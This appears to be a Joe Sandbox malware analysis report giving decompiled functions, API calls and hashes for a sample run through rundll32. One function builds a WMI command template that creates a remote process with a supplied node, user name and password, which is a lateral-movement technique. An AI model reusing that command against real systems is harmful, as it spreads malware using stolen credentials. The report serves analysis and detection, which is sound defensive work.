Opcode ID: 004ff342218fdd6cdfceb3a52d41d8204f3a51b1b7644749e802be64b399ad7a
Instruction ID: afbc07415132512f5b9b8fe1812ecc66d8ba350784b52a56bccff97a238283b0
Opcode Fuzzy Hash: 004ff342218fdd6cdfceb3a52d41d8204f3a51b1b7644749e802be64b399ad7a
Instruction Fuzzy Hash: C8F0C47054420AFBDF249BA4DD4AF9D7B78AB44725F204250B611E10E0E7B8EE45DA18

Uniqueness

Uniqueness Score: -1.00%

Function 007B4B5D Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 305
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B4B5D(intOrPtr* __eax, void* _a4, signed char _a7, intOrPtr* _a8, signed int* _a12, signed short* _a16) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _t120;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				signed short _t136;
				void* _t139;
				void* _t141;
				signed char _t143;
				signed short _t145;
				intOrPtr* _t147;
				intOrPtr* _t150;
				intOrPtr* _t153;
				signed char _t156;
				intOrPtr* _t160;
				intOrPtr* _t163;
				intOrPtr* _t166;
				signed char _t169;
				signed short _t171;
				intOrPtr* _t176;
				intOrPtr* _t182;
				intOrPtr* _t187;
				signed char _t188;
				intOrPtr _t189;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				short _t202;
				signed int _t203;
				intOrPtr* _t205;
				intOrPtr* _t208;
				intOrPtr* _t211;
				intOrPtr _t214;
				intOrPtr _t216;
				intOrPtr _t218;
				intOrPtr _t219;
				intOrPtr _t221;
				intOrPtr _t223;
				signed int _t225;
				intOrPtr _t227;
				signed int _t228;
				intOrPtr _t230;
				intOrPtr* _t232;
				void* _t234;
				intOrPtr _t236;
				signed char _t237;
				intOrPtr _t238;
				signed char _t239;
				intOrPtr* _t240;
				signed int _t241;
				intOrPtr _t243;
				void* _t245;
				void* _t252;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t263;
				void* _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				signed int _t276;
				void* _t278;
				void* _t279;
				void* _t280;
				signed int _t281;
				void* _t282;

				_t187 = __eax;
				 *_a12 =  *_a12 & 0x00000000;
				_t120 = __eax;
				_v5 = 0;
				_t3 = _t120 + 1; // 0x1
				_t265 = _t3;
				do {
					_t189 =  *_t120;
					_t120 = _t120 + 1;
				} while (_t189 != 0);
				_v12 = _t120 - _t265;
				_t122 = __eax;
				_t5 = _t122 + 1; // 0x1
				_t266 = _t5;
				do {
					_t190 =  *_t122;
					_t122 = _t122 + 1;
				} while (_t190 != 0);
				_t245 = _t122 - _t266;
				_t124 = __eax;
				_t6 = _t124 + 1; // 0x1
				_t267 = _t6;
				do {
					_t191 =  *_t124;
					_t124 = _t124 + 1;
				} while (_t191 != 0);
				_v16 = _t124 - _t267;
				_t126 = __eax;
				_t8 = _t126 + 1; // 0x1
				_t268 = _t8;
				do {
					_t192 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t192 != 0);
				_t234 = _t126 - _t268;
				_t128 = _a8;
				_t10 = _t128 + 1; // 0x1
				_t269 = _t10;
				do {
					_t193 =  *_t128;
					_t128 = _t128 + 1;
				} while (_t193 != 0);
				_v20 = _t128 - _t269;
				_t130 = _a8;
				_t13 = _t130 + 1; // 0x1
				_t270 = _t13;
				do {
					_t194 =  *_t130;
					_t130 = _t130 + 1;
				} while (_t194 != 0);
				_t20 = (_v12 + _v16 + _v20) * 2; // 0x10088
				_t136 = (0x0000fffe - _t245 + _t245 & 0x00000003) + (0x0000fffe - _t234 + _t234 & 0x00000003) + (0x0000fffe - _t130 - _t270 + _t130 - _t270 & 0x00000003) + _t20 + 0x8a;
				 *_a16 = _t136;
				_t139 = HeapAlloc(GetProcessHeap(), 8, _t136 & 0x0000ffff);
				 *_a12 = _t139;
				if(_t139 != 0) {
					_t276 = 0;
					_t252 = 0x18;
					do {
						_t23 = _t276 + 0x7c3730; // 0xfcfffffa
						 *(_t276 + _t139) =  !( *_t23);
						_t276 = _t276 + 1;
						_t252 = _t252 - 1;
					} while (_t252 != 0);
					_t202 = 0xc;
					 *(_t139 + 0xc) = 2;
					 *((short*)(_t139 + 0x16)) = _t202;
					_t28 = _t139 + 0x18; // 0x18
					_t203 = 5;
					_t141 = memcpy(_t28, _a4, _t203 << 2);
					_t205 = _t187;
					_t30 = _t205 + 1; // 0x1
					_t278 = _t30;
					do {
						_t236 =  *_t205;
						_t205 = _t205 + 1;
					} while (_t236 != 0);
					 *((intOrPtr*)(_t141 + 0x2c)) = _t205 - _t278 + 1;
					_t208 = _t187;
					_t32 = _t208 + 1; // 0x1
					_t279 = _t32;
					do {
						_t237 =  *_t208;
						_t208 = _t208 + 1;
					} while (_t237 != 0);
					 *((intOrPtr*)(_t141 + 0x34)) = _t208 - _t279 + 1;
					_t211 = _t187;
					_v12 = 0x38;
					_a7 = _t237;
					_t36 = _t211 + 1; // 0x1
					_t280 = _t36;
					do {
						_t238 =  *_t211;
						_t211 = _t211 + 1;
					} while (_t238 != 0);
					if(_t211 != _t280) {
						_t241 = 0;
						do {
							_v12 = _v12 + 2;
							_a7 = _a7 + 1;
							 *((char*)(_t141 + (_v12 & 0x0000ffff))) =  *((intOrPtr*)(_t241 + _t187));
							_t232 = _t187;
							_t44 = _t232 + 1; // 0x1
							_t282 = _t44;
							do {
								_t243 =  *_t232;
								_t232 = _t232 + 1;
							} while (_t243 != 0);
							_t241 = _a7 & 0x000000ff;
						} while (_t241 < _t232 - _t282);
					}
					_v12 = _v12 + 2;
					_t143 = _v12 & 3;
					if(_t143 < 0) {
						_t143 = (_t143 - 0x00000001 | 0xfffffffc) + 1;
					}
					if(_t143 != 0) {
						_v12 = _v12 + (_t143 & 0x000000ff);
					}
					_t281 =  *_a12;
					_t145 = rand();
					_v12 = _v12 + 4;
					 *((_v12 & 0x0000ffff) + _t281) = _t145 & 0x0000ffff;
					_t147 = _t187;
					_t56 = _t147 + 1; // 0x1
					_t256 = _t56;
					do {
						_t214 =  *_t147;
						_t147 = _t147 + 1;
					} while (_t214 != 0);
					_v12 = _v12 + 8;
					 *((_v12 & 0x0000ffff) + _t281) = _t147 - _t256 + 1;
					_t150 = _t187;
					_t61 = _t150 + 1; // 0x1
					_t257 = _t61;
					do {
						_t216 =  *_t150;
						_t150 = _t150 + 1;
					} while (_t216 != 0);
					_v12 = _v12 + 4;
					 *((_v12 & 0x0000ffff) + _t281) = _t150 - _t257 + 1;
					_t153 = _t187;
					_t239 = 0;
					_t66 = _t153 + 1; // 0x1
					_t258 = _t66;
					do {
						_t218 =  *_t153;
						_t153 = _t153 + 1;
					} while (_t218 != 0);
					if(_t153 != _t258) {
						_t228 = 0;
						do {
							_v12 = _v12 + 2;
							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t228 + _t187));
							_t182 = _t187;
							_t239 = _t239 + 1;
							_t72 = _t182 + 1; // 0x1
							_t263 = _t72;
							do {
								_t230 =  *_t182;
								_t182 = _t182 + 1;
							} while (_t230 != 0);
							_t228 = _t239 & 0x000000ff;
						} while (_t228 < _t182 - _t263);
					}
					_v12 = _v12 + 2;
					_t156 = _v12 & 3;
					if(_t156 < 0) {
						_t156 = (_t156 - 0x00000001 | 0xfffffffc) + 1;
					}
					if(_t156 != 0) {
						_v12 = _v12 + (_t156 & 0x000000ff);
					}
					_v12 = _v12 + 4;
					_t240 = _a8;
					 *((_v12 & 0x0000ffff) + _t281) = 0xf01ff;
					_v12 = _v12 + 4;
					 *((_v12 & 0x0000ffff) + _t281) = 0x10;
					_v12 = _v12 + 8;
					 *((_v12 & 0x0000ffff) + _t281) = 2;
					_t160 = _t240;
					_t259 = _t160 + 1;
					do {
						_t219 =  *_t160;
						_t160 = _t160 + 1;
					} while (_t219 != 0);
					_v12 = _v12 + 8;
					 *((_v12 & 0x0000ffff) + _t281) = _t160 - _t259 + 1;
					_t163 = _t240;
					_t260 = _t163 + 1;
					do {
						_t221 =  *_t163;
						_t163 = _t163 + 1;
					} while (_t221 != 0);
					_v12 = _v12 + 4;
					 *((_v12 & 0x0000ffff) + _t281) = _t163 - _t260 + 1;
					_t166 = _t240;
					_t188 = 0;
					_t261 = _t166 + 1;
					do {
						_t223 =  *_t166;
						_t166 = _t166 + 1;
					} while (_t223 != 0);
					if(_t166 != _t261) {
						_t225 = 0;
						do {
							_v12 = _v12 + 2;
							 *((_v12 & 0x0000ffff) + _t281) =  *((intOrPtr*)(_t225 + _t240));
							_t176 = _t240;
							_t188 = _t188 + 1;
							_t262 = _t176 + 1;
							do {
								_t227 =  *_t176;
								_t176 = _t176 + 1;
							} while (_t227 != 0);
							_t225 = _t188 & 0x000000ff;
						} while (_t225 < _t176 - _t262);
					}
					_v12 = _v12 + 2;
					_t169 = _v12 & 3;
					if(_t169 < 0) {
						_t169 = (_t169 - 0x00000001 | 0xfffffffc) + 1;
					}
					if(_t169 != 0) {
						_v12 = _v12 + (_t169 & 0x000000ff);
					}
					_t171 = _v12 + 0x1c;
					 *_a16 = _t171;
					 *(_t281 + 8) = _t171;
					_v5 = 1;
				}
				return _v5;
			}

0x007b4b64
0x007b4b69
0x007b4b6d
0x007b4b70
0x007b4b74
0x007b4b74
0x007b4b77
0x007b4b77
0x007b4b79
0x007b4b7a
0x007b4b80
0x007b4b83
0x007b4b85
0x007b4b85
0x007b4b88
0x007b4b88
0x007b4b8a
0x007b4b8b
0x007b4b91
0x007b4b93
0x007b4b95
0x007b4b95
0x007b4b98
0x007b4b98
0x007b4b9a
0x007b4b9b
0x007b4ba1
0x007b4ba4
0x007b4ba6
0x007b4ba6
0x007b4ba9
0x007b4ba9
0x007b4bab
0x007b4bac
0x007b4bb2
0x007b4bb4
0x007b4bb7
0x007b4bb7
0x007b4bba
0x007b4bba
0x007b4bbc
0x007b4bbd
0x007b4bc3
0x007b4bc6
0x007b4bc9
0x007b4bc9
0x007b4bcc
0x007b4bcc
0x007b4bce
0x007b4bcf
0x007b4c04
0x007b4c04
0x007b4c0b
0x007b4c1b
0x007b4c24
0x007b4c28
0x007b4c30
0x007b4c32
0x007b4c33
0x007b4c33
0x007b4c3b
0x007b4c3e
0x007b4c3f
0x007b4c3f
0x007b4c47
0x007b4c48
0x007b4c4f
0x007b4c55
0x007b4c58
0x007b4c59
0x007b4c5b
0x007b4c5d
0x007b4c5d
0x007b4c60
0x007b4c60
0x007b4c62
0x007b4c63
0x007b4c6a
0x007b4c6d
0x007b4c6f
0x007b4c6f
0x007b4c72
0x007b4c72
0x007b4c74
0x007b4c75
0x007b4c7c
0x007b4c7f
0x007b4c81
0x007b4c88
0x007b4c8b
0x007b4c8b
0x007b4c8e
0x007b4c8e
0x007b4c90
0x007b4c91
0x007b4c97
0x007b4c99
0x007b4c9b
0x007b4ca2
0x007b4ca6
0x007b4ca9
0x007b4cac
0x007b4cae
0x007b4cae
0x007b4cb1
0x007b4cb1
0x007b4cb3
0x007b4cb4
0x007b4cb8
0x007b4cbe
0x007b4c9b
0x007b4cc2
0x007b4cca
0x007b4ccf
0x007b4cd5
0x007b4cd5
0x007b4cd8
0x007b4cdd
0x007b4cdd
0x007b4ce4
0x007b4ce6
0x007b4cf0
0x007b4cf7
0x007b4cfa
0x007b4cfc
0x007b4cfc
0x007b4cff
0x007b4cff
0x007b4d01
0x007b4d02
0x007b4d0d
0x007b4d11
0x007b4d14
0x007b4d16
0x007b4d16
0x007b4d19
0x007b4d19
0x007b4d1b
0x007b4d1c
0x007b4d24
0x007b4d2b
0x007b4d2e
0x007b4d30
0x007b4d32
0x007b4d32
0x007b4d35
0x007b4d35
0x007b4d37
0x007b4d38
0x007b4d3e
0x007b4d40
0x007b4d42
0x007b4d49
0x007b4d4d
0x007b4d50
0x007b4d52
0x007b4d54
0x007b4d54
0x007b4d57
0x007b4d57
0x007b4d59
0x007b4d5a
0x007b4d5e
0x007b4d63
0x007b4d42
0x007b4d67
0x007b4d6f
0x007b4d74
0x007b4d7a
0x007b4d7a
0x007b4d7d
0x007b4d82
0x007b4d82
0x007b4d8a
0x007b4d8e
0x007b4d91
0x007b4d9c
0x007b4da0
0x007b4dab
0x007b4daf
0x007b4db6
0x007b4db8
0x007b4dbb
0x007b4dbb
0x007b4dbd
0x007b4dbe
0x007b4dc9
0x007b4dcd
0x007b4dd0
0x007b4dd2
0x007b4dd5
0x007b4dd5
0x007b4dd7
0x007b4dd8
0x007b4de0
0x007b4de7
0x007b4dea
0x007b4dec
0x007b4dee
0x007b4df1
0x007b4df1
0x007b4df3
0x007b4df4
0x007b4dfa
0x007b4dfc
0x007b4dfe
0x007b4e05
0x007b4e09
0x007b4e0c
0x007b4e0e
0x007b4e10
0x007b4e13
0x007b4e13
0x007b4e15
0x007b4e16
0x007b4e1a
0x007b4e1f
0x007b4dfe
0x007b4e23
0x007b4e2b
0x007b4e30
0x007b4e36
0x007b4e36
0x007b4e39
0x007b4e3e
0x007b4e3e
0x007b4e48
0x007b4e4b
0x007b4e4e
0x007b4e52
0x007b4e52
0x007b4e5d

APIs

GetProcessHeap.KERNEL32(00000008,?,74654F20,77794DB0,00000000,?,00000000,00000000,00000000), ref: 007B4C14
HeapAlloc.KERNEL32(00000000), ref: 007B4C1B
rand.MSVCRT ref: 007B4CE6

Strings

Oet Uet0Xet, xrefs: 007B4C14
8, xrefs: 007B4C81

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$AllocProcessrand
String ID: Oet Uet0Xet$8
API String ID: 1878709018-91176900
Opcode ID: 739e1b83f532f091fc823c7ff8593941e107e32fb8742ec14401e964aac6dbc3
Instruction ID: a972ed056375da965b0cf0a47034fd96dc13ede52f146d44c780c321c190cf2f
Opcode Fuzzy Hash: 739e1b83f532f091fc823c7ff8593941e107e32fb8742ec14401e964aac6dbc3
Instruction Fuzzy Hash: B1B11631A042669FCB168F6C84643F97FF1EF06318F2581D9E8C5EB252DA39D94AC750

Uniqueness

Uniqueness Score: -1.00%

Function 007B641A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B641A(char* _a4) {
				int _v8;
				short* _v12;
				int _t7;
				short* _t11;
				int _t12;
				short* _t13;

				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
				_v8 = _t7;
				if(_t7 == 0) {
					L3:
					return 0;
				}
				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
				_v12 = _t11;
				if(_t11 == 0) {
					goto L3;
				}
				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
				_t13 = _v12;
				if(_t12 == 0) {
					goto L3;
				}
				return _t13;
			}

0x007b6439
0x007b643b
0x007b6440
0x007b646e
0x00000000
0x007b646e
0x007b644d
0x007b6453
0x007b6458
0x00000000
0x00000000
0x007b6465
0x007b6469
0x007b646c
0x00000000
0x00000000
0x007b6474

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,77974AB0,?), ref: 007B6439
GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B6446
HeapAlloc.KERNEL32(00000000), ref: 007B644D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 007B6465

Strings

Oet Uet0Xet, xrefs: 007B6446

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ByteCharHeapMultiWide$AllocProcess
String ID: Oet Uet0Xet
API String ID: 1432973188-3175316637
Opcode ID: e7fbd98854de30a9775b60c1fca34f839693ed70fc5de0edf760e055b38a326d
Instruction ID: 05f33e6501948140b751fc614037884de0bc106b2195b42db275f81683aadaee
Opcode Fuzzy Hash: e7fbd98854de30a9775b60c1fca34f839693ed70fc5de0edf760e055b38a326d
Instruction Fuzzy Hash: 25F096B6A0411DBFEB006FA89DC4DBF7ABCEB453647104235FA11E2190D1388D005770

Uniqueness

Uniqueness Score: -1.00%

Function 007B6CED Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6CED(signed int _a4, intOrPtr _a8) {
				void* __ebx;
				signed int* _t11;
				void* _t13;

				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t11 != 0) {
					 *_t11 =  *_t11 & 0x00000000;
					_t11[1] = _a4;
					if(E007B6D35(_t11, _t13, _a8) == 0) {
						_t11 = 0;
						HeapFree(GetProcessHeap(), 0, 0);
					}
				}
				return _t11;
			}

0x007b6d05
0x007b6d09
0x007b6d11
0x007b6d14
0x007b6d1e
0x007b6d21
0x007b6d27
0x007b6d27
0x007b6d1e
0x007b6d32

APIs

GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFC
HeapAlloc.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFF

Part of subcall function 007B6D35: EnterCriticalSection.KERNEL32(?,74654F20,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D46
Part of subcall function 007B6D35: LeaveCriticalSection.KERNEL32(?,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D7F
Part of subcall function 007B6D35: Sleep.KERNEL32(00002710,?,007B6D1C,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D97

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D24
HeapFree.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D27

Strings

Uet0Xet, xrefs: 007B6D27

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
String ID: Uet0Xet
API String ID: 2739146912-1689521831
Opcode ID: 34ec549b51880aecea8228a0672c24ea3b9a9d68cde67fa9a1e0187f209dad1f
Instruction ID: 03d6d317ce78aee7f59dd7dd35f998b0c16369a7233717a1248d0354894cf543
Opcode Fuzzy Hash: 34ec549b51880aecea8228a0672c24ea3b9a9d68cde67fa9a1e0187f209dad1f
Instruction Fuzzy Hash: BAE03972300349ABEB206FE99C89F97BB9DFB94314F008025FA008A110DABCD8088A20

Uniqueness

Uniqueness Score: -1.00%

Function 007B9972 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E007B9972(WCHAR* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				short _v88;
				short _v608;
				char _v1128;
				char _v17512;
				short _t72;
				short _t73;
				short _t74;
				short _t75;
				short _t76;
				short _t77;
				short _t79;
				short _t81;
				short _t82;
				signed int _t86;
				short _t91;
				WCHAR* _t96;
				short _t97;
				void* _t98;
				void _t99;
				signed int _t100;
				signed short* _t104;
				short _t107;
				signed int _t108;
				short _t109;
				void* _t112;
				short _t119;
				short _t120;
				short _t121;
				short _t123;
				short _t124;
				short _t125;
				short _t127;
				short _t131;
				short _t132;
				short _t133;
				short _t134;
				short _t135;
				short _t137;
				short _t138;
				short _t139;
				short _t140;
				short _t142;
				signed int _t145;
				void* _t146;

				_t96 = __ebx;
				E007BA760(0x4464);
				 *__ebx = 0;
				E007B88D3( &_v1128);
				_t72 = 0x2f;
				_v88 = _t72;
				_t73 = 0x6e;
				_v86 = _t73;
				_t74 = 0x6f;
				_v84 = _t74;
				_t75 = 0x64;
				_v82 = _t75;
				_t76 = 0x65;
				_v80 = _t76;
				_t77 = 0x3a;
				_t97 = 0x22;
				_v78 = _t77;
				_v76 = _t97;
				_t79 = 0x25;
				_t107 = 0x77;
				_v74 = _t79;
				_v72 = _t107;
				_t81 = 0x73;
				_v70 = _t81;
				_v68 = _t97;
				_t119 = 0x20;
				_v66 = _t119;
				_t120 = 0x2f;
				_v64 = _t120;
				_t121 = 0x75;
				_v62 = _t121;
				_v60 = _t81;
				_t123 = 0x65;
				_v58 = _t123;
				_t124 = 0x72;
				_v56 = _t124;
				_t125 = 0x3a;
				_v54 = _t125;
				_v52 = _t97;
				_t127 = 0x25;
				_v50 = _t127;
				_v48 = _t107;
				_v46 = _t81;
				_v44 = _t97;
				_t131 = 0x20;
				_v42 = _t131;
				_t132 = 0x2f;
				_v40 = _t132;
				_t133 = 0x70;
				_v38 = _t133;
				_t134 = 0x61;
				_v36 = _t134;
				_t135 = _t81;
				_v34 = _t135;
				_v32 = _t135;
				_v30 = _t107;
				_t137 = 0x6f;
				_v28 = _t137;
				_t138 = 0x72;
				_v26 = _t138;
				_t139 = 0x64;
				_v24 = _t139;
				_t140 = 0x3a;
				_v22 = _t140;
				_v20 = _t97;
				_t142 = 0x25;
				_v14 = _t81;
				_t82 = 0x20;
				_v10 = _t82;
				_v8 = 0;
				_v18 = _t142;
				_v16 = _t107;
				_v12 = _t97;
				_a12 = wsprintfW(__ebx,  &_v88, _a4, _a8, _a12);
				_t98 = 0;
				do {
					_t48 = _t98 + L"process call create \"C:\\Windows\\System32\\rundll32.exe"; // 0x720070
					_t108 =  *_t48 & 0x0000ffff;
					 *(_t146 + _t98 - 0x25c) = _t108;
					_t98 = _t98 + 2;
				} while (_t108 != 0);
				_t112 =  &_v608 - 2;
				do {
					_t99 =  *(_t112 + 2);
					_t112 = _t112 + 2;
				} while (_t99 != 0);
				_t100 = 0xb;
				_t86 = memcpy(_t112, L" \\\"C:\\Windows\\%s\\\" #1 ", _t100 << 2);
				asm("movsw");
				_t145 = _a12 + wsprintfW( &(__ebx[_t86]),  &_v608,  &_v1128);
				E007B6735( &_v17512, 0x1fff);
				_t104 =  &_v17512;
				while(1) {
					_t91 =  *_t104 & 0x0000ffff;
					if(_t91 == 0x22) {
						_t109 = 0x5c;
						_t96[_t145] = _t109;
						_t145 = _t145 + 1;
					}
					_t96[_t145] = _t91;
					if(_t91 == 0) {
						break;
					}
					_t104 =  &(_t104[1]);
					_t145 = _t145 + 1;
				}
				wsprintfW( &(_t96[_t145]), "\"");
				return 1;
			}

0x007b9972
0x007b997a
0x007b9982
0x007b998d
0x007b9994
0x007b9997
0x007b999b
0x007b999e
0x007b99a2
0x007b99a5
0x007b99a9
0x007b99ac
0x007b99b0
0x007b99b3
0x007b99b7
0x007b99ba
0x007b99bd
0x007b99c3
0x007b99c7
0x007b99ca
0x007b99cd
0x007b99d3
0x007b99d7
0x007b99dc
0x007b99e2
0x007b99e6
0x007b99e9
0x007b99ed
0x007b99f0
0x007b99f4
0x007b99f5
0x007b99fd
0x007b9a01
0x007b9a04
0x007b9a08
0x007b9a09
0x007b9a0f
0x007b9a10
0x007b9a18
0x007b9a1c
0x007b9a1d
0x007b9a23
0x007b9a29
0x007b9a31
0x007b9a35
0x007b9a38
0x007b9a3c
0x007b9a3d
0x007b9a43
0x007b9a46
0x007b9a4a
0x007b9a4d
0x007b9a51
0x007b9a53
0x007b9a57
0x007b9a5d
0x007b9a61
0x007b9a64
0x007b9a68
0x007b9a6b
0x007b9a6f
0x007b9a72
0x007b9a76
0x007b9a79
0x007b9a7f
0x007b9a83
0x007b9a86
0x007b9a8a
0x007b9a8e
0x007b9a9a
0x007b9aa3
0x007b9aa7
0x007b9aab
0x007b9ab8
0x007b9abb
0x007b9abd
0x007b9abd
0x007b9abd
0x007b9ac4
0x007b9acc
0x007b9acf
0x007b9ada
0x007b9add
0x007b9add
0x007b9ae1
0x007b9ae4
0x007b9aeb
0x007b9af1
0x007b9b04
0x007b9b15
0x007b9b23
0x007b9b28
0x007b9b2e
0x007b9b2e
0x007b9b34
0x007b9b38
0x007b9b39
0x007b9b3d
0x007b9b3d
0x007b9b3e
0x007b9b45
0x00000000
0x00000000
0x007b9b47
0x007b9b4a
0x007b9b4a
0x007b9b56
0x007b9b60

APIs

Part of subcall function 007B88D3: PathFindFileNameW.SHLWAPI(007C7BC8,76B5C0B0,?,007B95B2), ref: 007B88E3

wsprintfW.USER32 ref: 007B9AAF
wsprintfW.USER32 ref: 007B9B0D
wsprintfW.USER32 ref: 007B9B56

Strings

\"C:\Windows\%s\" #1 , xrefs: 007B9AEC

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: wsprintf$FileFindNamePath
String ID: \"C:\Windows\%s\" #1
API String ID: 988121887-1875761687
Opcode ID: 422b2f636fc971e008645dca3a3146cd2aa7ecec983329626cdeda5acd83db86
Instruction ID: d2db18a2a848996df5b6e0cd1f0b2b2fa97ce8ca6ab1d1a7bd88016ae96d786f
Opcode Fuzzy Hash: 422b2f636fc971e008645dca3a3146cd2aa7ecec983329626cdeda5acd83db86
Instruction Fuzzy Hash: DF517523E24358A5DB20DBD4EC05BEFB774FF447A0F14606AE604AB2A0F6B54940C79A

Uniqueness

Uniqueness Score: -1.00%

Function 007B6F7C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007B6F7C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "IsWow64Process");
				if(_t7 != 0) {
					 *_t7(_a4,  &_v8);
				}
				return _v8;
			}

0x007b6f80
0x007b6f95
0x007b6f9d
0x007b6fa6
0x007b6fa6
0x007b6fac

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,007B7170,00000000,?,007B7AF8), ref: 007B6F8E
GetProcAddress.KERNEL32(00000000), ref: 007B6F95

Strings

kernel32.dll, xrefs: 007B6F89
IsWow64Process, xrefs: 007B6F84

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32.dll
API String ID: 1646373207-3024904723
